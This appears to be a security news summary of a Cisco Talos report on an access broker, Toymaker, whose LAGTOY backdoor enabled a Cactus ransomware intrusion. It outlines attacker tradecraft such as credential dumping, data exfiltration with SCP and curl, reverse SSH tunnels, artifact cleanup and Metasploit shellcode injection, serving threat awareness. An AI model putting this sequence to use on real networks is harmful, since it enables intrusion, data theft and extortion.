An Initial Access Broker Facilitates a Cactus Ransomware Intrusion in Multi-Phase Breach

An intrusion enabled by an initial access broker (IAB) tracked as Toymaker led to the deployment of Cactus ransomware against a critical infrastructure organization in 2023. Cisco Talos reported the intrusion involving both threat actors. The campaign began when Toymaker successfully compromised the target environment, ultimately deploying a custom backdoor named LAGTOY. This implant served as a foothold and was maintained through persistence mechanisms. After initial enumeration and credential harvesting, the attackers remained inactive for three weeks. Activity resumed when access was handed off to a Cactus ransomware affiliate, who initiated a twelve-day operational window that included reconnaissance, credential abuse, data exfiltration, and eventual ransomware deployment.

Toymaker's intrusion spanned only a few days and focused on swift enumeration, persistence, and setup. Enumeration was performed using native Windows commands including "whoami," "net," "nltest," and "ipconfig." The actor created a new user account named "support" and added it to the local administrators group. To establish control, an SSH listener was configured using OpenSSH, and memory was dumped via Magnet RAM Capture. The dump was archived using 7za and exfiltrated with PuTTY's SCP utility. The LAGTOY backdoor was installed and persisted as a Windows service named "WmiPrvSV," with hardcoded C2 communication over TCP port 443. Notably, LAGTOY incorporated a custom time-based execution logic and anti-debugging protections. Cisco Talos notes, "LAGTOY uses a unique time-based logic to decide whether it needs to execute commands or Sleep for a specific time period. Talos assesses with high confidence that this logic is a novel custom built unique to the LAGTOY family of implants."

The Cactus affiliate initiated activity three weeks after Toymaker's access, conducting reconnaissance through PowerShell scripts to enumerate remote endpoints and storing results in CSV files. These artifacts were archived using 7-Zip and exfiltrated using "curl.exe." Registry modifications were made to clear run history and RDP connection traces. The enumeration and cleanup activity spanned the initial two of the twelve days before ransomware deployment. On the fourth day, data exfiltration began, with tools like WinSCP used to extract files and data. Scheduled tasks were created for persistence and tunneling, including hourly SSH-based reverse connections using system-level jobs. Permissions on SSH key files were modified with "icacls" to restrict visibility and obstruct analysis.

Additional activity included the use of remote administration tools such as AnyDesk, eHorus Agent, OpenSSH, and Windows Admin (RMS Remote Admin). The affiliate created new accounts such as "whiteninja" and modified boot settings to force entry into Safe Mode. Metasploit was used to deploy shellcode-injected versions of binaries like PuTTY and ApacheBench, which communicated over multiple ports with actor-controlled infrastructure. The actor’s behavior—particularly the exfiltration of organizational and customer data and the removal of forensic artifacts—aligned with known double-extortion tactics. Cisco Talos’ reporting of this coordinated campaign illustrates the operational link between initial access brokers and ransomware affiliates.